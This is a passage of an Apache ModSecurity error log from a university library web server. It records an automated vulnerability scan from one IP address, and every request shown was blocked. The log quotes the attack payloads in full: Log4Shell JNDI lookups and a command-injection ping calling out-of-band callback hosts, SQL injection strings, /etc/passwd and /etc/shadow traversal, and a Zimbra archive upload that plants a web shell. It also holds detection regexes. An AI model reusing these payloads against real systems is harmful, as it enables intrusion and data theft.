"/yyoa/common/js/menu/test.jsp"] [unique_id "ZO11OcCo-f0AAASHh5YAAAAD"]
[Tue Aug 29 11:34:03.373200 2023] [:error] [pid 1164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-419}${:-626}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgrtzpdnyo7pymc.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO11O8Co-f0AAASMge4AAAAO"]
[Tue Aug 29 11:34:04.409498 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: { found within ARGS:login: $(ping${IFS}-nc${IFS}2${IFS}`whoami`.cjmn8l5jmimk2adbbnlgw7jbq36bghp3x.oast.site)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/login/index.php"] [unique_id "ZO11PMCo-f0AAASS79gAAAAY"]
[Tue Aug 29 11:34:06.399848 2023] [:error] [pid 1183] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22},{\\x22 found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22kevinlab\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22kevin003\\x22},{\\x22name\\x22:\\x22device_key\\x22,\\x22value\\x22:\\x22a2fe6b53-e09d-46df-8c9a-e666430e163e\\x22},{\\x22name\\x22:\\x22auto_login\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO11PsCo-f0AAASfNt8AAAAg"]
[Tue Aug 29 11:34:07.295298 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "digilibfeb.unla.ac.id"] [uri "/user/register"] [unique_id "ZO11P8Co-f0AAASEJSgAAAAE"]
[Tue Aug 29 11:34:07.325625 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:month: 1 AND (SELECT 6881 FROM (SELECT(SLEEP(6)))iEAn)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11P8Co-f0AAARjjVMAAAAL"]
[Tue Aug 29 11:34:08.325354 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QMCo-f0AAASAHgIAAAAH"]
[Tue Aug 29 11:34:08.328160 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:country_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:country_id: 1 AND (SELECT 42 FROM (SELECT(SLEEP(6)))b)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAARdiPMAAAAK"]
[Tue Aug 29 11:34:08.375773 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:term: aaa' union select 1,sleep(6),3-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAARQ4GAAAAAB"]
[Tue Aug 29 11:34:09.305079 2023] [:error] [pid 1168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '-- - found within ARGS:username: admin' or '1'='1'-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11QcCo-f0AAASQqAEAAAAT"]
[Tue Aug 29 11:34:10.305119 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username: admin cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/weblogin.cgi"] [unique_id "ZO11QsCo-f0AAARjjVkAAAAL"]
[Tue Aug 29 11:34:10.334418 2023] [:error] [pid 1168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:x: ${jndi:ldap://${:-178}${:-654}.${hostName}.uri.cjmn8l5jmimk2adbbnlgxienfbyqqzj4f.oast.site/a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11QsCo-f0AAASQqAUAAAAT"]
[Tue Aug 29 11:34:10.375789 2023] [:error] [pid 1171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QsCo-f0AAAST5AgAAAAZ"]
[Tue Aug 29 11:34:11.339392 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:company_id[1][0]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:company_id[1][0]: test\\x22) and extractvalue(1,concat(0x7e,md5(999999999))) -- a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11Q8Co-f0AAASI0A0AAAAG"]
[Tue Aug 29 11:34:11.364869 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:${jndi:ldap://${:-178}${:-654}.${hostName}.cookiename.cjmn8l5jmimk2adbbnlgwn5ur6o7pyhxb.oast.site}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:${jndi:ldap://${:-178}${:-654}.${hostName}.cookiename.cjmn8l5jmimk2adbbnlgwn5ur6o7pyhxb.oast.site}: ${jndi:ldap://${:-178}${:-654}.${hostName}.cookievalue.cjmn8l5jmimk2adbbnlgiq5dx6bqszry4.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11Q8Co-f0AAARQ4GoAAAAB"]
[Tue Aug 29 11:34:12.397073 2023] [:error] [pid 1173] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sort. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:sort: 1 and extractvalue(1,concat(0x7e,md5(999999999))) -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/api.php"] [unique_id "ZO11RMCo-f0AAASVoH8AAAAe"]
[Tue Aug 29 11:34:13.314410 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:userIdentifiers. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union(select found within ARGS:userIdentifiers: -1)union(select(3),null,null,null,null,null,str(98989*44313),null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/mobile/plugin/SyncUserInfo.jsp"] [unique_id "ZO11RcCo-f0AAASEJTsAAAAE"]
[Tue Aug 29 11:34:15.347145 2023] [:error] [pid 1165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgrseprk865s69e.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgrseprk865s69e.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo"] [unique_id "ZO11R8Co-f0AAASNzqIAAAAQ"]
[Tue Aug 29 11:34:15.348345 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11R8Co-f0AAASGMuAAAAAA"]
[Tue Aug 29 11:34:16.343227 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "digilibfeb.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAASK4foAAAAI"]
[Tue Aug 29 11:34:16.343269 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "digilibfeb.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAASK4foAAAAI"]
[Tue Aug 29 11:34:16.347822 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23 found within TX:1: example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11SMCo-f0AAAPDoNwAAAAP"]
[Tue Aug 29 11:34:16.381390 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/dummy"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11SMCo-f0AAASEJUUAAAAE"]
[Tue Aug 29 11:34:17.323356 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/shadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/crowd/plugins/servlet/exp"] [unique_id "ZO11ScCo-f0AAASI0CIAAAAG"]
[Tue Aug 29 11:34:19.307786 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22 found within ARGS:json: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22test\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/userportal/Controller"] [unique_id "ZO11S8Co-f0AAASEJVIAAAAE"]
[Tue Aug 29 11:34:19.339302 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'uqzM'='uqzM found within ARGS:email: 2UdxlnvuySJpqs8tqGtER6xDqNl@gmail.com' AND (SELECT 2549 FROM (SELECT(SLEEP(6)))LIzI) AND 'uqzM'='uqzM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11S8Co-f0AAASGMvAAAAAA"]
[Tue Aug 29 11:34:19.421753 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-454}${:-171}.${hostName}.username.cjmn8l5jmimk2adbbnlgebnhz97p9ds8u.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/login"] [unique_id "ZO11S8Co-f0AAASGMvQAAAAA"]
[Tue Aug 29 11:34:23.175881 2023] [:error] [pid 1233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ping_ipaddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ping_ipaddr: 127.0.0.1 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/apply_sec.cgi"] [unique_id "ZO11T8Co-f0AAATRZVEAAAAQ"]
[Tue Aug 29 11:34:23.615207 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:profileIdx2. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()), found within ARGS:profileIdx2: updatexml(0,concat(0xa,user()),0)::"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/jsrpc.php"] [unique_id "ZO11T8Co-f0AAASS8AQAAAAY"]
[Tue Aug 29 11:34:25.472762 2023] [:error] [pid 1239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x22id\\x22: 1, \\x22method\\x22: \\x22global.login\\x22, \\x22params\\x22: {\\x22authorityType\\x22: \\x22Default\\x22, \\x22clientType\\x22: \\x22NetKeyboard\\x22, \\x22loginType\\x22: \\x22Direct\\x22, \\x22password\\x22: \\x22Not Used\\x22, \\x22passwordType\\x22: \\x22Default\\x22, \\x22userName\\x22: \\x22admin\\x22}, \\x22session\\x22: 0}: {\\x22id\\x22: 1, [hostname "digilibfeb.unla.ac.id"] [uri "/RPC2_Login"] [unique_id "ZO11UcCo-f0AAATXLJsAAAAb"]
[Tue Aug 29 11:34:26.253270 2023] [:error] [pid 1256] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag 